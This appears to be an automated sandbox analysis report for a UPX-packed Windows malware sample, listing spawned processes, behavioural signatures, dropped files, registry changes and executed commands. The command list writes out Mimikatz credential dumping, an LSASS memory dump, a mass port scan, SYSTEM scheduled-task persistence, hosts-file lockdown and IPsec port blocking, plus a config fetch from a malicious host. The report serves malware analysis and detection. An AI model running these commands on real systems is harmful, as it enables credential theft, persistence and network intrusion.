Exes_e77b8548080e4a20eb74f40003cb9b42_exe_2019-06-24_20_30.json

1.  
2. [*] MalFamily: ""
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "Exes_e77b8548080e4a20eb74f40003cb9b42.exe"
7. [*] File Size: 5427200
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
9. [*] SHA256: "0105905704b61fcdebe72c1f344237df510451e1bad08986c8629d9857084e0c"
10. [*] MD5: "e77b8548080e4a20eb74f40003cb9b42"
11. [*] SHA1: "fdefa723f8f48227b28fd750dece152a3fb8d8c2"
12. [*] SHA512: "551b574502257f3a95f8d6b1ceb798ef69f793bcf5e8eb5425644c3b6e8a98ee84cbad856c57a4faa6fdb954e34db1093b5e05f186d0d0d102da23f166a59201"
13. [*] CRC32: "0F1DD1BB"
14. [*] SSDEEP: "98304:gKq+Q2ru+FBpaizgQA0JzpxsMnuviWyUGGKo8YXBfZcH8AKqkWC6ssZWjACGDZH/:S1g59A0JznXoiYG8M+oFZ0ACFA1o"
15.  
16. [*] Process Execution: [
17. "Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
18. "cmd.exe",
19. "PING.EXE",
20. "ghllihr.exe",
21. "services.exe",
22. "ghllihr.exe",
23. "cmd.exe",
24. "cmd.exe",
25. "cacls.exe",
26. "cmd.exe",
27. "cacls.exe",
28. "cmd.exe",
29. "cacls.exe",
30. "netsh.exe",
31. "netsh.exe",
32. "netsh.exe",
33. "cmd.exe",
34. "wpcap.exe",
35. "net.exe",
36. "net1.exe",
37. "net.exe",
38. "net1.exe",
39. "net.exe",
40. "net1.exe",
41. "net.exe",
42. "net1.exe",
43. "cmd.exe",
44. "net.exe",
45. "net1.exe",
46. "cmd.exe",
47. "pygejcepu.exe",
48. "cmd.exe",
49. "vfshost.exe",
50. "cmd.exe",
51. "cmd.exe",
52. "schtasks.exe",
53. "cmd.exe",
54. "cmd.exe",
55. "schtasks.exe",
56. "cmd.exe",
57. "cmd.exe",
58. "schtasks.exe",
59. "netsh.exe",
60. "netsh.exe",
61. "netsh.exe",
62. "netsh.exe",
63. "urpjswrnu.exe",
64. "netsh.exe",
65. "netsh.exe",
66. "svchost.exe",
67. "svchost.exe",
68. "svchost.exe",
69. "muemii.exe"
70. ]
71.  
72. [*] Signatures Detected: [
73. {
74. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
75. "Details": [
76. {
77. "IP": "192.35.177.64:80"
78. },
79. {
80. "IP": "2.21.71.25:80"
81. }
82. ]
83. },
84. {
85. "Description": "Possible date expiration check, exits too soon after checking local time",
86. "Details": [
87. {
88. "process": "cmd.exe, PID 2444"
89. }
90. ]
91. },
92. {
93. "Description": "Creates RWX memory",
94. "Details": []
95. },
96. {
97. "Description": "Loads a driver",
98. "Details": [
99. {
100. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\npf"
101. }
102. ]
103. },
104. {
105. "Description": "Expresses interest in specific running processes",
106. "Details": [
107. {
108. "process": "lsass.exe"
109. },
110. {
111. "process": "services.exe"
112. },
113. {
114. "process": "csrss.exe"
115. },
116. {
117. "process": "svchost.exe"
118. },
119. {
120. "process": "[System Process]"
121. },
122. {
123. "process": "spoolsv.exe"
124. },
125. {
126. "process": "wininit.exe"
127. },
128. {
129. "process": "pygejcepu.exe"
130. },
131. {
132. "process": "winlogon.exe"
133. },
134. {
135. "process": "lsm.exe"
136. }
137. ]
138. },
139. {
140. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
141. "Details": []
142. },
143. {
144. "Description": "Reads data out of its own binary image",
145. "Details": [
146. {
147. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x00000200"
148. },
149. {
150. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x0000c000"
151. },
152. {
153. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000200, length: 0x00069f39"
154. },
155. {
156. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x0000c01c, length: 0x0005e121"
157. }
158. ]
159. },
160. {
161. "Description": "Performs some HTTP requests",
162. "Details": [
163. {
164. "url": "http://uio.hognoob.se:63145/cfg.ini"
165. },
166. {
167. "url": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D"
168. },
169. {
170. "url": "http://crl.identrust.com/DSTROOTCAX3CRL.crl"
171. }
172. ]
173. },
174. {
175. "Description": "The binary likely contains encrypted or compressed data.",
176. "Details": [
177. {
178. "section": "name: UPX1, entropy: 7.82, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0052c800, virtual_size: 0x0052d000"
179. }
180. ]
181. },
182. {
183. "Description": "The executable is compressed using UPX",
184. "Details": [
185. {
186. "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00170000"
187. }
188. ]
189. },
190. {
191. "Description": "Deletes its original binary from disk",
192. "Details": []
193. },
194. {
195. "Description": "Forces a created process to be the child of an unrelated process",
196. "Details": []
197. },
198. {
199. "Description": "A process attempted to delay the analysis task by a long amount of time.",
200. "Details": [
201. {
202. "Process": "netsh.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds"
203. },
204. {
205. "Process": "ghllihr.exe tried to sleep 7129 seconds, actually delayed analysis time by 0 seconds"
206. }
207. ]
208. },
209. {
210. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
211. "Details": [
212. {
213. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 5180833 times"
214. }
215. ]
216. },
217. {
218. "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
219. "Details": [
220. {
221. "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
222. }
223. ]
224. },
225. {
226. "Description": "Mimics the file times of a Windows system file",
227. "Details": [
228. {
229. "mimic_dest": "C:\\Program Files\\WinPcap\\LICENSE",
230. "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
231. },
232. {
233. "mimic_dest": "C:\\Program Files\\WinPcap\\rpcapd.exe",
234. "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
235. }
236. ]
237. },
238. {
239. "Description": "Installs itself for autorun at Windows startup",
240. "Details": [
241. {
242. "service name": "tqbseelza"
243. },
244. {
245. "service path": "C:\\Windows\\crznklud\\ghllihr.exe"
246. },
247. {
248. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath"
249. },
250. {
251. "data": "system32\\drivers\\npf.sys"
252. },
253. {
254. "task": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\""
255. }
256. ]
257. },
258. {
259. "Description": "Creates a hidden or system file",
260. "Details": [
261. {
262. "file": "C:\\Windows\\crznklud\\svschost.xml"
263. },
264. {
265. "file": "C:\\Windows\\crznklud\\spoolsrv.xml"
266. },
267. {
268. "file": "C:\\Windows\\crznklud\\vimpcsvc.xml"
269. },
270. {
271. "file": "C:\\Windows\\crznklud\\docmicfg.xml"
272. },
273. {
274. "file": "C:\\Windows\\crznklud\\schoedcl.xml"
275. }
276. ]
277. },
278. {
279. "Description": "The sample wrote data to the system hosts file.",
280. "Details": []
281. },
282. {
283. "Description": "Collects information to fingerprint the system",
284. "Details": []
285. },
286. {
287. "Description": "Installs WinPCAP",
288. "Details": [
289. {
290. "file": "C:\\Windows\\System32\\Packet.dll"
291. }
292. ]
293. }
294. ]
295.  
296. [*] Started Service: [
297. "tqbseelza",
298. "WerSvc",
299. "PolicyAgent",
300. "npf"
301. ]
302.  
303. [*] Executed Commands: [
304. "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crznklud\\ghllihr.exe",
305. "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5",
306. "C:\\Windows\\crznklud\\ghllihr.exe",
307. "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
308. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
309. "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
310. "netsh ipsec static del all",
311. "netsh ipsec static add policy name=Bastards description=FuckingBastards",
312. "netsh ipsec static add filteraction name=BastardsList action=block",
313. "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
314. "cmd /c net start npf",
315. "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
316. "cmd /c C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
317. "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
318. "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
319. "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\"",
320. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
321. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP",
322. "netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList",
323. "netsh ipsec static set policy name=Bastards assign=y",
324. "C:\\Windows\\TEMP\\zjbrqggku\\urpjswrnu.exe -accepteula -mp 1128 C:\\Windows\\TEMP\\zjbrqggku\\1128.dmp",
325. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
326. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP",
327. "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\"",
328. "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users",
329. "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators",
330. "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
331. "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
332. "net stop \"Boundary Meter\"",
333. "net stop \"TrueSight Meter\"",
334. "net stop npf",
335. "net start npf",
336. "C:\\Windows\\system32\\net1 stop \"Boundary Meter\"",
337. "C:\\Windows\\system32\\net1 stop \"TrueSight Meter\"",
338. "C:\\Windows\\system32\\net1 stop npf",
339. "C:\\Windows\\system32\\net1 start npf",
340. "net start npf",
341. "C:\\Windows\\system32\\net1 start npf",
342. "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
343. "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit",
344. "schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
345. "schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
346. "schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\""
347. ]
348.  
349. [*] Mutexes: [
350. "IESQMMUTEX_0_208"
351. ]
352.  
353. [*] Modified Files: [
354. "C:\\Windows\\crznklud\\ghllihr.exe",
355. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\TemporaryFile",
356. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
357. "C:\\Windows\\System32\\drivers\\etc\\hosts",
358. "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe",
359. "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe",
360. "C:\\Windows\\zjbrqggku\\rtalrauta\\Packet.dll",
361. "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.dll",
362. "C:\\Windows\\zjbrqggku\\rtalrauta\\lblgpauls.exe",
363. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\cnli-1.dll",
364. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\coli-0.dll",
365. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\crli-0.dll",
366. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\exma-1.dll",
367. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libeay32.dll",
368. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libxml2.dll",
369. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\posh-0.dll",
370. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ssleay32.dll",
371. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tibe-2.dll",
372. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trch-1.dll",
373. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trfo-2.dll",
374. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tucl-1.dll",
375. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ucl.dll",
376. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\xdvl-0.dll",
377. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\zlib1.dll",
378. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.exe",
379. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.exe",
380. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.exe",
381. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.exe",
382. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.exe",
383. "C:\\Windows\\zjbrqggku\\UnattendGC\\svschost.xml",
384. "C:\\Windows\\zjbrqggku\\UnattendGC\\spoolsrv.xml",
385. "C:\\Windows\\zjbrqggku\\UnattendGC\\vimpcsvc.xml",
386. "C:\\Windows\\zjbrqggku\\UnattendGC\\docmicfg.xml",
387. "C:\\Windows\\zjbrqggku\\UnattendGC\\schoedcl.xml",
388. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.xml",
389. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.xml",
390. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.xml",
391. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.xml",
392. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.xml",
393. "C:\\Windows\\crznklud\\svschost.xml",
394. "C:\\Windows\\crznklud\\spoolsrv.xml",
395. "C:\\Windows\\crznklud\\vimpcsvc.xml",
396. "C:\\Windows\\crznklud\\docmicfg.xml",
397. "C:\\Windows\\crznklud\\schoedcl.xml",
398. "C:\\Windows\\zjbrqggku\\UnattendGC\\Shellcode.ini",
399. "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture64.dll",
400. "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture32.dll",
401. "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe",
402. "C:\\Windows\\zjbrqggku\\Corporate\\mimidrv.sys",
403. "C:\\Windows\\zjbrqggku\\Corporate\\mimilib.dll",
404. "C:\\Windows\\zjbrqggku\\upbdrjv\\swrpwe.exe",
405. "C:\\Windows\\IME\\ghllihr.exe",
406. "C:\\Windows\\Temp\\zjbrqggku\\urpjswrnu.exe",
407. "C:\\Windows\\Temp\\nbkteejuk\\muemii.exe",
408. "C:\\Windows\\Temp\\nbkteejuk\\config.json",
409. "C:\\Windows\\Temp\\20882968\\....\\TemporaryFile",
410. "C:\\Windows\\Temp\\20882968\\TemporaryFile",
411. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
412. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
413. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\644B8874112055B5E195ECB0E8F243A4",
414. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\644B8874112055B5E195ECB0E8F243A4",
415. "\\Device\\NamedPipe",
416. "\\Device\\Http\\Communication",
417. "C:\\Windows\\Temp\\nsm5019.tmp",
418. "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
419. "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
420. "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
421. "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
422. "C:\\Windows\\System32\\pthreadVC.dll",
423. "C:\\Windows\\System32\\wpcap.dll",
424. "C:\\Windows\\System32\\Packet.dll",
425. "C:\\Program Files\\WinPcap\\rpcapd.exe",
426. "C:\\Program Files\\WinPcap\\LICENSE",
427. "C:\\Program Files\\WinPcap\\uninstall.exe",
428. "C:\\Windows\\sysnative\\drivers\\npf.sys",
429. "C:\\Windows\\sysnative\\wpcap.dll",
430. "C:\\Windows\\sysnative\\Packet.dll",
431. "\\??\\Global\\NPF_{CFCD29B3-A836-426F-8329-8362EC941293}",
432. "\\??\\Global\\NPF_{D720734D-0C14-4C25-829D-F6B4814978B3}",
433. "\\??\\Global\\NPF_{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}",
434. "\\??\\Global\\NPF_{B22E8C55-CC74-4FBE-B907-F46D25953BEC}",
435. "\\??\\Global\\NPF_{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}",
436. "\\??\\Global\\NPF_NdisWanIpv6",
437. "\\??\\Global\\NPF_NdisWanBh",
438. "\\??\\Global\\NPF_{8C8DAC1D-0390-4B59-BF93-EC6C9E68D36A}",
439. "\\??\\Global\\NPF_NdisWanIp",
440. "\\??\\Global\\NPF_{BFA735C0-8C32-4848-B88D-FA17C2729720}",
441. "\\??\\Global\\NPF_{50CD5E3E-0F08-4519-A9EF-B9802ED12701}",
442. "\\??\\Global\\NPF_{D25DE530-2291-4668-A771-4DAC18E7B55D}",
443. "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
444. "C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
445. "C:\\Windows\\sysnative\\Tasks\\trztipllt",
446. "C:\\Windows\\Temp\\zjbrqggku\\1128.dmp",
447. "\\??\\Global\\ProcmonDebugLogger"
448. ]
449.  
450. [*] Deleted Files: [
451. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
452. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\",
453. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile\\TemporaryFile",
454. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
455. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656",
456. "C:\\Windows\\zjbrqggku\\rtalrauta\\ip.txt",
457. "C:\\Windows\\zjbrqggku\\rtalrauta\\Result.txt",
458. "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
459. "C:\\Windows\\Temp\\nbkteejuk\\config.json",
460. "C:\\Windows\\Temp\\20882968\\....\\",
461. "C:\\Windows\\Temp\\20882968\\TemporaryFile\\TemporaryFile",
462. "C:\\Windows\\Temp\\20882968\\TemporaryFile",
463. "C:\\Windows\\Temp\\20882968",
464. "C:\\Windows\\Temp\\nsg4FF8.tmp",
465. "C:\\Windows\\Temp\\nsm501A.tmp",
466. "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
467. "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
468. "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
469. "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
470. "C:\\Windows\\Temp\\nsm501A.tmp\\",
471. "C:\\Windows\\Tasks\\trztipllt.job"
472. ]
473.  
474. [*] Modified Registry Keys: [
475. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
476. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Start",
477. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf",
478. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Type",
479. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Start",
480. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ErrorControl",
481. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath",
482. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\DisplayName",
483. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\WOW64",
484. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
485. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings",
486. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
487. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
488. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
489. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
490. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
491. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
492. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
493. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
494. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
495. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
496. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
497. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
498. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
499. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
500. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
501. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
502. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
503. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}",
504. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\className",
505. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\name",
506. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecID",
507. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecDataType",
508. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecData",
509. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\whenChanged",
510. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}",
511. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\className",
512. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\name",
513. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecID",
514. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyAction",
515. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyType",
516. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecDataType",
517. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecData",
518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\whenChanged",
519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}",
520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\className",
521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\description",
